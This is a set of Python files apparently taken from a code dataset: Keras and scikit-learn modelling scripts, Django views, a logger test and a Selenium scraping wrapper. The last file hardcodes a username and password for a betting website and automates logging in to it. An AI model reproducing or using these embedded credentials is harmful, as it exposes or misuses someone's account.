"file_name": "sotuken03.py", "file_ext": "py", "file_size_in_byte": 2725, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "os.chdir", "line_number": 22, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 25, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 28, "usage_type": "call"}, {"api_name": "tensorflow.keras.models.Sequential", "line_number": 47, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.Dense", "line_number": 48, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.Dense", "line_number": 49, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.Dense", "line_number": 50, "usage_type": "call"}, {"api_name": "tensorflow.keras.optimizers.Adam", 
"line_number": 53, "usage_type": "call"}, {"api_name": "tensorflow.keras.optimizers", "line_number": 53, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 79, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 79, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 80, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 80, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 81, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 81, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 82, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 82, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 83, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 83, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 84, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 84, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 85, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 85, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 86, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 86, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 87, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 87, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 88, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 88, "usage_type": "name"}]}
+{"seq_id": "471240300", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jun 20 17:52:02 2018\n\n@author: ashwin bhatt\n\"\"\"\n\nfrom __future__ import print_function\nimport keras\nfrom keras.datasets import mnist\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Activation\nfrom keras.layers.recurrent import LSTM\nfrom keras import backend as K\nfrom keras import optimizers\n\n\n\n\n# the data, split between train and test sets\n(x_train, y_train), (x_test, y_test) = mnist.load_data()\nn_classes = 10\nn_classes = 10\nx_train = x_train.astype('float32')\nx_test = x_test.astype('float32')\nprint('x_train shape:', x_train.shape)\nprint(x_train.shape[0], 'train samples')\nprint(x_test.shape[0], 'test samples')\n\nx_train = x_train.reshape(-1,28,28)\nx_test = x_test.reshape(-1,28,28)\n\n# convert class vectors to binary class matrices\ny_train = keras.utils.to_categorical(y_train, n_classes)\ny_test = keras.utils.to_categorical(y_test, n_classes)\n\n#create rnn model\nmodel = Sequential()\nmodel.add(LSTM(units = 16,activation='relu',input_shape=(28,28)))\nmodel.add(Dense(n_classes))\nmodel.add(Activation('softmax'))\n\nmodel.compile(loss='categorical_crossentropy',\n optimizer=keras.optimizers.RMSprop(lr=0.01),\n metrics=['accuracy'])\n\n\nmodel.summary\n\nmodel.fit(x_train,y_train,\n batch_size=100,epochs=20)\n\n\nscore = model.evaluate(x_test,y_test)\nprint('\\nTest loss:',score[0])\nprint('test accuracy:',score[1])\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n", "sub_path": "keras lstm.py", "file_name": "keras lstm.py", "file_ext": "py", "file_size_in_byte": 1433, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "keras.datasets.mnist.load_data", "line_number": 21, "usage_type": "call"}, {"api_name": "keras.datasets.mnist", "line_number": 21, "usage_type": "name"}, {"api_name": "keras.utils.to_categorical", "line_number": 34, "usage_type": "call"}, {"api_name": "keras.utils", "line_number": 34, "usage_type": "attribute"}, {"api_name": "keras.utils.to_categorical", "line_number": 35, "usage_type": "call"}, {"api_name": "keras.utils", "line_number": 35, "usage_type": "attribute"}, {"api_name": "keras.models.Sequential", "line_number": 38, "usage_type": "call"}, {"api_name": "keras.layers.recurrent.LSTM", "line_number": 39, "usage_type": "call"}, {"api_name": "keras.layers.Dense", "line_number": 40, "usage_type": "call"}, {"api_name": "keras.layers.Activation", "line_number": 41, "usage_type": "call"}, {"api_name": "keras.optimizers.RMSprop", "line_number": 44, "usage_type": "call"}, {"api_name": "keras.optimizers", "line_number": 44, "usage_type": "attribute"}]}
+{"seq_id": "536342751", "text": "from django.shortcuts import render\nfrom .forms import UserAskForm, UserCommentForm\nfrom django.http import JsonResponse\nfrom .models import UserLove, UserComment\nfrom orgs.models import OrgInfo, TeacherInfo\nfrom courses.models import CourseInfo\nfrom django.core.serializers import serialize\nfrom tools.decorators import login_decorator\n\n\n# Create your views here.\ndef user_ask(request):\n user_ask_form = UserAskForm(request.POST)\n if user_ask_form.is_valid():\n user_ask_form.save(commit=True)\n # name = user_ask_form.cleaned_data['name']\n # phone = user_ask_form.cleaned_data['phone']\n # course = user_ask_form.cleaned_data['course']\n # a = UserAsk()\n # a.name = name\n # a.phone = phone\n # a.course = course\n # a.save()\n return JsonResponse({'status': 'ok', 'msg': '咨询成功'})\n else:\n return JsonResponse({'status': 'fail', 'msg': '咨询失败'})\n\n\n@login_decorator\ndef user_love(request):\n loveid = request.GET.get('loveid', '')\n lovetype = request.GET.get('lovetype', '')\n if loveid and lovetype:\n # 根据传递过来的收藏类型,判断是什么对象,根据传递过来的收藏id,判断收藏的是哪一个对象。\n obj = None\n if int(lovetype) == 1:\n obj = OrgInfo.objects.filter(id=int(loveid))[0]\n if int(lovetype) == 2:\n obj = CourseInfo.objects.filter(id=int(loveid))[0]\n if int(lovetype) == 3:\n obj = TeacherInfo.objects.filter(id=int(loveid))[0]\n\n # 如果收藏的id和type同时存在,那么我们首先要去到收藏表当中去查找有没有这个用户的这个收藏记录\n love = UserLove.objects.filter(love_id=int(loveid), love_type=int(lovetype), love_man=request.user)\n if love:\n # 如果本来已经存在收藏这个东西的记录,那么我们需要判断收藏的状态,如果收藏状态为真,代表之前收藏过,并且现在的页面上应显示的是取消收藏,代表着这次点击是为了取消收藏\n if love[0].love_status:\n love[0].love_status = False\n love[0].save()\n obj.love_num -= 1\n obj.save()\n return JsonResponse({'status': 'ok', 'msg': '收藏'})\n # 如果收藏状态为假,代表之前收藏过,并且又取消了收藏,并且现在的页面上应显示的是收藏,代表着这次点击是为了收藏\n else:\n love[0].love_status = True\n love[0].save()\n obj.love_num += 1\n obj.save()\n return JsonResponse({'status': 'ok', 'msg': '取消收藏'})\n else:\n # 如果之前没有收藏过这个东西,那么代表着表当中没有这个记录,所以,我们需要先创建这个记录对象,然后把这个记录的状态改为True\n a = UserLove()\n a.love_man = request.user\n a.love_id = int(loveid)\n a.love_type = int(lovetype)\n a.love_status = True\n a.save()\n obj.love_num += 1\n obj.save()\n return JsonResponse({'status': 'ok', 'msg': '取消收藏'})\n else:\n return JsonResponse({'status': 'fail', 'msg': '收藏失败'})\n\n\ndef user_comment(request):\n user_comment_form = UserCommentForm(request.POST)\n if user_comment_form.is_valid():\n course = user_comment_form.cleaned_data['course']\n content = user_comment_form.cleaned_data['content']\n a = UserComment()\n a.comment_man = request.user\n a.comment_content = content\n a.comment_course_id = course\n a.save()\n\n # all_comments = UserComment.objects.filter(comment_course_id=course)\n #\n # all_comments = serialize('json',all_comments)\n #\n # return JsonResponse(all_comments,safe=False)\n return JsonResponse({'status': 'ok', 'msg': '评论成功'})\n else:\n return JsonResponse({'status': 'fail', 'msg': '评论失败'})\n\n\ndef user_deletelove(request):\n loveid = request.GET.get('loveid', '')\n lovetype = request.GET.get('lovetype', '')\n if loveid and lovetype:\n love = UserLove.objects.filter(love_id=int(loveid), love_type=int(lovetype), love_man=request.user,\n love_status=True)\n if love:\n love[0].love_status = False\n love[0].save()\n return JsonResponse({'status': 'ok', 'msg': '取消成功'})\n else:\n return JsonResponse({'status': 'fail', 'msg': '取消失败'})\n else:\n return JsonResponse({'status': 'fail', 'msg': '取消失败'})\n", "sub_path": "GuLiEdu/apps/operations/views.py", "file_name": 
"views.py", "file_ext": "py", "file_size_in_byte": 4718, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "forms.UserAskForm", "line_number": 13, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 24, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 26, "usage_type": "call"}, {"api_name": "orgs.models.OrgInfo.objects.filter", "line_number": 37, "usage_type": "call"}, {"api_name": "orgs.models.OrgInfo.objects", "line_number": 37, "usage_type": "attribute"}, {"api_name": "orgs.models.OrgInfo", "line_number": 37, "usage_type": "name"}, {"api_name": "courses.models.CourseInfo.objects.filter", "line_number": 39, "usage_type": "call"}, {"api_name": "courses.models.CourseInfo.objects", "line_number": 39, "usage_type": "attribute"}, {"api_name": "courses.models.CourseInfo", "line_number": 39, "usage_type": "name"}, {"api_name": "orgs.models.TeacherInfo.objects.filter", "line_number": 41, "usage_type": "call"}, {"api_name": "orgs.models.TeacherInfo.objects", "line_number": 41, "usage_type": "attribute"}, {"api_name": "orgs.models.TeacherInfo", "line_number": 41, "usage_type": "name"}, {"api_name": "models.UserLove.objects.filter", "line_number": 44, "usage_type": "call"}, {"api_name": "models.UserLove.objects", "line_number": 44, "usage_type": "attribute"}, {"api_name": "models.UserLove", "line_number": 44, "usage_type": "name"}, {"api_name": "django.http.JsonResponse", "line_number": 52, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 59, "usage_type": "call"}, {"api_name": "models.UserLove", "line_number": 62, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 70, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 72, "usage_type": "call"}, {"api_name": "tools.decorators.login_decorator", "line_number": 29, "usage_type": "name"}, {"api_name": "forms.UserCommentForm", "line_number": 76, "usage_type": "call"}, {"api_name": "models.UserComment", "line_number": 80, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 91, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 93, "usage_type": "call"}, {"api_name": "models.UserLove.objects.filter", "line_number": 100, "usage_type": "call"}, {"api_name": "models.UserLove.objects", "line_number": 100, "usage_type": "attribute"}, {"api_name": "models.UserLove", "line_number": 100, "usage_type": "name"}, {"api_name": "django.http.JsonResponse", "line_number": 105, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 107, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 109, "usage_type": "call"}]}
+{"seq_id": "605026960", "text": "from unittest.mock import patch\n\nimport pytest\n\nfrom pytorch_lightning.loggers import CometLogger\nfrom pytorch_lightning.utilities.exceptions import MisconfigurationException\n\n\ndef test_comet_logger_online():\n \"\"\"Test comet online with mocks.\"\"\"\n # Test api_key given\n with patch('pytorch_lightning.loggers.comet.CometExperiment') as comet:\n logger = CometLogger(\n api_key='key',\n workspace='dummy-test',\n project_name='general'\n )\n\n _ = logger.experiment\n\n comet.assert_called_once_with(\n api_key='key',\n workspace='dummy-test',\n project_name='general'\n )\n\n # Test both given\n with patch('pytorch_lightning.loggers.comet.CometExperiment') as comet:\n logger = CometLogger(\n save_dir='test',\n api_key='key',\n workspace='dummy-test',\n project_name='general'\n )\n\n _ = logger.experiment\n\n comet.assert_called_once_with(\n api_key='key',\n workspace='dummy-test',\n project_name='general'\n )\n\n # Test neither given\n with pytest.raises(MisconfigurationException):\n CometLogger(\n workspace='dummy-test',\n project_name='general'\n )\n\n # Test already exists\n with patch('pytorch_lightning.loggers.comet.CometExistingExperiment') as comet_existing:\n logger = CometLogger(\n experiment_key='test',\n experiment_name='experiment',\n api_key='key',\n workspace='dummy-test',\n project_name='general'\n )\n\n _ = logger.experiment\n\n comet_existing.assert_called_once_with(\n api_key='key',\n workspace='dummy-test',\n project_name='general',\n previous_experiment='test'\n )\n\n comet_existing().set_name.assert_called_once_with('experiment')\n\n with patch('pytorch_lightning.loggers.comet.API') as api:\n CometLogger(\n api_key='key',\n workspace='dummy-test',\n project_name='general',\n rest_api_key='rest'\n )\n\n api.assert_called_once_with('rest')\n", "sub_path": "tests/loggers/test_comet.py", "file_name": "test_comet.py", "file_ext": "py", "file_size_in_byte": 2197, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "unittest.mock.patch", "line_number": 12, "usage_type": "call"}, {"api_name": "pytorch_lightning.loggers.CometLogger", "line_number": 13, "usage_type": "call"}, {"api_name": "unittest.mock.patch", "line_number": 28, "usage_type": "call"}, {"api_name": "pytorch_lightning.loggers.CometLogger", "line_number": 29, "usage_type": "call"}, {"api_name": "pytest.raises", "line_number": 45, "usage_type": "call"}, {"api_name": "pytorch_lightning.utilities.exceptions.MisconfigurationException", "line_number": 45, "usage_type": "argument"}, {"api_name": "pytorch_lightning.loggers.CometLogger", "line_number": 46, "usage_type": "call"}, {"api_name": "unittest.mock.patch", "line_number": 52, "usage_type": "call"}, {"api_name": "pytorch_lightning.loggers.CometLogger", "line_number": 53, "usage_type": "call"}, {"api_name": "unittest.mock.patch", "line_number": 72, "usage_type": "call"}, {"api_name": "pytorch_lightning.loggers.CometLogger", "line_number": 73, "usage_type": "call"}]}
+{"seq_id": "134748082", "text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sun Nov 18 07:08:30 2018\r\n\r\n@author: mpagrawa\r\n\"\"\"\r\n\r\n#import house_11112018 as parent\r\n\r\nimport numpy as np\r\nimport pandas as pd\r\nimport matplotlib.pyplot as plt\r\nimport seaborn as sns\r\nimport sqlalchemy as sql\r\nimport statsmodels.formula.api as sm\r\nimport scipy.stats as stats\r\n\r\nfrom sklearn import preprocessing\r\n\r\nfrom sqlalchemy import create_engine\r\nengine = create_engine('sqlite://', echo=False)\r\n\r\nfrom sklearn.preprocessing import PolynomialFeatures\r\npoly = PolynomialFeatures(2)\r\n\r\n#%matplotlib inline\r\nsns.set_style('whitegrid')\r\n\r\ndef StartOverDf():\r\n house = pd.read_csv('kc_house_data.csv', parse_dates=['date'])\r\n del house['id']\r\n del house['lat']\r\n del house['long']\r\n return house\r\n\r\ndef AdjustedRSquare(model,X,Y):\r\n YHat = model.predict(X)\r\n n,k = X.shape\r\n sse = np.sum(np.square(YHat-Y),axis=0)\r\n sst = np.sum(np.square(Y-np.mean(Y)),axis=0)\r\n R2 = 1- sse/sst\r\n adjR2 = R2-(1-R2)*(float(k)/(n-k-1))\r\n return adjR2\r\n\r\ndef BackwardElimination(X,y,sl):\r\n columnList = X.columns.tolist() \r\n for i in range(0, len(columnList)):\r\n regressor_OLS = sm.OLS(y, X[columnList]).fit()\r\n adjR2_before = regressor_OLS.rsquared_adj \r\n maxVar = max(regressor_OLS.pvalues) \r\n if maxVar > sl:\r\n ind = regressor_OLS.pvalues[regressor_OLS.pvalues == max(regressor_OLS.pvalues)].index[0]\r\n columnList_new = columnList.copy()\r\n columnList_new.remove(ind)\r\n temp_OLS = sm.OLS(y, X[columnList_new]).fit()\r\n adjR2_after = temp_OLS.rsquared_adj\r\n print('before', adjR2_before)\r\n print('after', adjR2_after, '\\n')\r\n if adjR2_before > adjR2_after:\r\n return columnList\r\n else:\r\n columnList.remove(ind) \r\n return columnList\r\n\r\ndef PolyFeatureNames(featureNames):\r\n # interaction features\r\n featureNames = ['intercept'] + featureNames \r\n polyFeatureNames = []; \r\n for i,x in enumerate(featureNames):\r\n for y in featureNames[i:]:\r\n if (x == 'intercept'):\r\n polyFeatureNames.append(y)\r\n elif (x==y):\r\n polyFeatureNames.append((y+'_Square'))\r\n else:\r\n polyFeatureNames.append((x+'_'+y))\r\n return polyFeatureNames\r\n\r\nfrom sklearn.model_selection import GridSearchCV\r\n#from sklearn.grid_search import GridSearchCV\r\nfrom sklearn.cross_validation import ShuffleSplit\r\nfrom sklearn.metrics import make_scorer\r\nfrom sklearn.metrics import r2_score\r\n\r\ndef performance_metric(y_true, y_predict):\r\n score = r2_score(y_true, y_predict)\r\n return score\r\n\r\n\r\ndef fit_model(X,y):\r\n cv_sets = ShuffleSplit(X.shape[0],n_iter=10,\r\n test_size=0.20,\r\n random_state=1234)\r\n ridgeModel = Ridge()\r\n params = {'alpha':list(range(0,5)),\r\n 'solver' : ('auto', \r\n 'svd', \r\n 'cholesky', \r\n 'lsqr', \r\n 'sparse_cg', \r\n 'sag', \r\n 'saga')}\r\n scoring_func = make_scorer(performance_metric)\r\n grid = GridSearchCV(ridgeModel,params,scoring_func,cv=cv_sets)\r\n grid = grid.fit(X,y)\r\n return grid.best_estimator_\r\n\r\nhouse = StartOverDf()\r\n#plt.figure(figsize=(15,10))\r\n#sns.heatmap(house.corr(), annot=True, cmap='coolwarm')\r\nmax_date = max(house.date)\r\nhouse['Age_sold'] = house['date'].apply(lambda x: ((max_date - x).days))\r\nhouse['House_Built_Age'] = 2015-house['yr_built']\r\nhouse['House_Renovated_Age'] = 2015-house['yr_renovated']\r\nhouse['Tot_Bathrooms'] = house.bathrooms * house.bedrooms\r\nhouse['Price_Sqft'] = house.price / house.sqft_living15\r\nhouse['Price_Sqft_lot'] = 
house.price / house.sqft_lot15\r\ndel(house['bathrooms'])\r\nhouse.at[house.index[house.bedrooms ==33],'bedrooms'] = 3\r\nhouse.at[house.index[house.bedrooms ==11],'bedrooms'] = 3\r\n\r\n\r\nhouse= pd.get_dummies(house, columns =['view'], drop_first=True)\r\nhouse= pd.get_dummies(house, columns =['grade'], drop_first=True)\r\nhouse= pd.get_dummies(house, columns =['zipcode'], drop_first=True)\r\nhouse= pd.get_dummies(house, columns =['condition'], drop_first=True)\r\nhouse= pd.get_dummies(house, columns =['floors'], drop_first=True)\r\nhouse= pd.get_dummies(house, columns =['bedrooms'], drop_first=True)\r\n# sqft_living and lot areas have changed even though house is not renovated\r\n# drop older coloumns considering 15 data as the latest and accurate\r\n\r\n\r\nX = house.drop(['price','date','sqft_living','sqft_lot','sqft_above','sqft_basement','yr_built','yr_renovated'], axis=1)\r\ny = house.price\r\n\r\n\r\n# Stats model\r\nX['intercept'] = 1\r\nres = BackwardElimination(X,y,0.05)\r\n\r\n#regressor_OLS = sm.OLS(y, X).fit()\r\n#regressor_OLS.summary()\r\n\r\n#regressor_OLS.pvalues\r\n#res.remove('intercept')\r\n\r\nXpoly = poly.fit_transform(X[res])\r\n#polyFeatureNames = PolyFeatureNames(X.columns.tolist())\r\npolyFeatureNames = PolyFeatureNames(res)\r\n#polyFeatureNames = PolyFeatureNames(['House_Renovated_Age','tot_bathrooms'])\r\n#Xpoly.shape\r\nXpolyDf = pd.DataFrame(Xpoly, columns=polyFeatureNames)\r\n#X = XpolyDf\r\n\r\n#zip_unique = list(set(X.zipcode))\r\n\r\n#from statsmodels.stats.multicomp import pairwise_tukeyhsd\r\n#output = pairwise_tukeyhsd(y,X.zipcode)\r\n#output.summary()\r\n#df = pd.DataFrame(output.summary())\r\n#df = pd.DataFrame(data=output._results_table.data[1:], columns=output._results_table.data[0])\r\n#df1 = df[df.reject == False]\r\n#output.plot_simultaneous()[0]\r\n\r\n\r\n\r\nfrom sklearn.linear_model import LinearRegression\r\nlm = LinearRegression()\r\nfrom sklearn.model_selection import train_test_split\r\n#X_train, X_test, y_train, y_test = train_test_split(X[res], y, test_size=0.3, random_state=5)\r\nX_train, X_test, y_train, y_test = train_test_split(X[res], y, test_size=0.3, random_state=5)\r\nlm.fit(X_train, y_train)\r\ncoefMetrics = pd.DataFrame(index=X_train.columns, data=lm.coef_)\r\nR2_train = lm.score(X_train, y_train)\r\nR2_test = lm.score(X_test, y_test)\r\ny_pred = lm.predict(X_test)\r\nadjR2_train = AdjustedRSquare(lm,X_train,y_train)\r\nadjR2_test = AdjustedRSquare(lm,X_test,y_test)\r\n\r\n\r\nfrom sklearn.linear_model import Lasso\r\nlm1 = Lasso(alpha=1, max_iter=5000)\r\nfrom sklearn import cross_validation as cv\r\n#X_train_L, X_test_L, y_train_L, y_test_L = cv.train_test_split(X,y, test_size=0.25,random_state=1234)\r\n#X_train, X_test, y_train, y_test = train_test_split(X[res], y, test_size=0.3, random_state=5)\r\nX_train_L, X_test_L, y_train_L, y_test_L = cv.train_test_split(X[res], y, test_size=0.3, random_state=5)\r\nlm1.fit(X_train_L, y_train_L)\r\ncoefMetrics = pd.DataFrame(index=X_train_L.columns, data=lm.coef_)\r\nR2_train = lm1.score(X_train_L, y_train_L)\r\nR2_test = lm1.score(X_test_L, y_test_L)\r\ny_pred = lm1.predict(X_test_L)\r\nadjR2_train1 = AdjustedRSquare(lm1,X_train_L,y_train_L)\r\nadjR2_test1 = AdjustedRSquare(lm1,X_test_L,y_test_L)\r\n\r\n\r\nfrom sklearn.linear_model import Ridge\r\nlm1 = Ridge(alpha=1,max_iter=5000, solver='svd')\r\n#from sklearn.model_selection import cross_validate as cv\r\nfrom sklearn import cross_validation as cv\r\n#from sklearn import cross_validation as cv\r\n#X_train_L, X_test_L, 
y_train_L, y_test_L = cv.train_test_split(X,y, test_size=0.25,random_state=1234)\r\n#X_train, X_test, y_train, y_test = train_test_split(X[res], y, test_size=0.3, random_state=5)\r\nX_train_L, X_test_L, y_train_L, y_test_L = cv.train_test_split(X[res], y, test_size=0.3, random_state=5)\r\nlm1.fit(X_train_L, y_train_L)\r\ncoefMetrics = pd.DataFrame(index=X_train_L.columns, data=lm.coef_)\r\nR2_train = lm1.score(X_train_L, y_train_L)\r\nR2_test = lm1.score(X_test_L, y_test_L)\r\ny_pred = lm1.predict(X_test_L)\r\nadjR2_train2 = AdjustedRSquare(lm1,X_train_L,y_train_L)\r\nadjR2_test2 = AdjustedRSquare(lm1,X_test_L,y_test_L)\r\n\r\n\r\n#best_estimate = fit_model(X_train,y_train)\r\n#best_estimate\r\n#Ridge(alpha=1, copy_X=True, fit_intercept=True, max_iter=None,\r\n# normalize=False, random_state=None, solver='svd', tol=0.001)\r\n#adjR2_train = 0.9439\r\n#adjR2_test = 0.9419\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n", "sub_path": "house_EDA_11112018.py", "file_name": "house_EDA_11112018.py", "file_ext": "py", "file_size_in_byte": 8094, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "sqlalchemy.create_engine", "line_number": 21, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.PolynomialFeatures", "line_number": 24, "usage_type": "call"}, {"api_name": "seaborn.set_style", "line_number": 27, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 30, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 39, "usage_type": "call"}, {"api_name": "numpy.square", "line_number": 39, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 40, "usage_type": "call"}, {"api_name": "numpy.square", "line_number": 40, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 40, "usage_type": "call"}, {"api_name": "statsmodels.formula.api.OLS", "line_number": 48, "usage_type": "call"}, {"api_name": "statsmodels.formula.api", "line_number": 48, "usage_type": "name"}, {"api_name": "statsmodels.formula.api.OLS", "line_number": 55, "usage_type": "call"}, {"api_name": "statsmodels.formula.api", "line_number": 55, "usage_type": "name"}, {"api_name": "sklearn.metrics.r2_score", "line_number": 86, "usage_type": "call"}, {"api_name": "sklearn.cross_validation.ShuffleSplit", "line_number": 91, "usage_type": "call"}, {"api_name": "sklearn.metrics.make_scorer", "line_number": 103, "usage_type": "call"}, {"api_name": "sklearn.model_selection.GridSearchCV", "line_number": 104, "usage_type": "call"}, {"api_name": "pandas.get_dummies", "line_number": 123, "usage_type": "call"}, {"api_name": "pandas.get_dummies", "line_number": 124, "usage_type": "call"}, {"api_name": "pandas.get_dummies", "line_number": 125, "usage_type": "call"}, {"api_name": "pandas.get_dummies", "line_number": 126, "usage_type": "call"}, {"api_name": "pandas.get_dummies", "line_number": 127, "usage_type": "call"}, {"api_name": "pandas.get_dummies", "line_number": 128, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 152, "usage_type": "call"}, {"api_name": "sklearn.linear_model.LinearRegression", "line_number": 168, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 171, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 173, "usage_type": "call"}, {"api_name": "sklearn.linear_model.Lasso", "line_number": 182, "usage_type": "call"}, {"api_name": "sklearn.cross_validation.train_test_split", "line_number": 186, 
"usage_type": "call"}, {"api_name": "sklearn.cross_validation", "line_number": 186, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 188, "usage_type": "call"}, {"api_name": "sklearn.linear_model.Ridge", "line_number": 197, "usage_type": "call"}, {"api_name": "sklearn.cross_validation.train_test_split", "line_number": 203, "usage_type": "call"}, {"api_name": "sklearn.cross_validation", "line_number": 203, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 205, "usage_type": "call"}]}
+{"seq_id": "545889766", "text": "import time\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\n\n### A basic wrapper to selenium for scraping data\n## - driver - the selenium web browser driver\n## - username - username for login\n## - password - password for login\n## - url_home - The url to navigate to when the browser is created\n## - url_login - The url to use when we login.\n## - url_post_login - The url to navigate to after login\n\n## - actions - A list of actions to do at given urls.\n\n## - get_url() - get current url\n## - set_url() - Navigate to a new url\n\n\n\n### An object that can describe anything. \n### It accepts any parameter to initialize,\n### including type, a variable that can be used to better describe this object\nclass AbstractObject(dict):\n\n \n def __init__(self, **kwargs):\n for key, value in kwargs.items():\n self.__setattr__(key, value)\n \n def __str__(self):\n string = \"<\" + self.type + ': '\n for variable, value in self.__dict__.items():\n string += variable + \"=\" + str(value) + \", \"\n return string + \">\"\n \n \n \n### An abstract wrapper for selenium. \n### This will allow selenium to preform basic actions, \n### for which there is a list that requires some customization, with some basic navigation.\n### Because we inherit from AbstractObject this class too can be customized and expanded very easily.\n### Adding a key to the _attrs dict will result in a new variable inside the object.\n### A named action list will allow functions to be added on the fly even after creation of an object.\nclass SeleniumHandler(AbstractObject):\n _attrs = {\n 'driver':None, # Selenium webdriver\n 'username':'', # for login\n 'password':'', # for login\n 'url_home':'', # The sites home url\n 'url_login':'', # The url used to login to the site (sometimes can be the same as home url)\n 'url_post_login':'', # The url we want to navigate to after login\n 'nav_time':2, # How long we wait after we go to a new url\n 'actions':{}, # Custom actions called by controller (scraper.py)\n 'is_logged_in': False,\n 'login_action_name': 'Login',\n }\n \n def __init__(self, **kwargs):\n for var, val in SeleniumHandler._attrs.items():\n if var not in kwargs:\n kwargs[var] = val\n \n super(SeleniumHandler, self).__init__(**kwargs)\n if (self.driver):\n self.driver\n \n def add_action(self, action_class):\n action = action_class(self)\n self.actions[action.name] = action\n self.__setattr__(action.name, action)\n print (\"[+] \", action_class.__name__) \n \n def get(self, url):\n if (url == \"\"): return\n self.driver.get(url)\n time.sleep(self.nav_time)\n \n def home(self):\n self.get(self.url_home)\n \n \n ### Call the login action only if there is one.\n ### We can do this from the home page if this site can login from the home site\n ### Otherwise go to login url if there is one.\n \n def login(self, redirect = True):\n results = None\n if self.login_action_name not in self.actions.keys(): return results\n \n # the action here is the login action. It is an object. 
We can call action.Login() on it.\n action = self.actions[self.login_action_name]\n\n # Login if we are at the home page and we can login from the home page\n if self.is_home() and self.can_login_from_home():\n \n print(\"before action.invoke : \",redirect)\n \n action.invoke(post_login_redirect = redirect)\n \n print(\"after action.invoke : \",redirect)\n \n # Otherwise \n \n else: \n self.get(self.url_login)\n results = action.invoke(post_login_redirect = redirect)\n if (results is not None):\n self.is_logged_in = True\n \n return results\n \n \n def is_home(self): return self.current_url == self.url_home\n def current_url(self): return self.driver.current_url\n def can_login_from_home(self): return self.url_home == self.url_login\n\n\n\n\n\n\n\n\n\n\nclass StrikerdotHandler(SeleniumHandler):\n def __init__(self):\n variables = {\n \"type\":\"Handler\",\n 'driver': webdriver.Firefox(),\n 'username': 'R1036', 'password': 'yeet3',\n 'url_home': 'http://www.strikerdot.com',\n 'url_login': 'http://www.strikerdot.com',\n 'url_post_login': \"https://www.strikerdot.com/sports.html?livebettingEZ=ready?logged=1#!\",\n }\n super(StrikerdotHandler, self).__init__(**variables)\n ", "sub_path": "selenium_handler.py", "file_name": "selenium_handler.py", "file_ext": "py", "file_size_in_byte": 4914, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "time.sleep", "line_number": 79, "usage_type": "call"}, {"api_name": "selenium.webdriver.Firefox", "line_number": 133, "usage_type": "call"}, {"api_name": "selenium.webdriver", "line_number": 133, "usage_type": "name"}]}
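The module describes its workflow in the header comment but never demonstrates it; a minimal usage sketch, assuming a `LoginAction` class written against the `add_action` interface above (that class is hypothetical, not part of the module):

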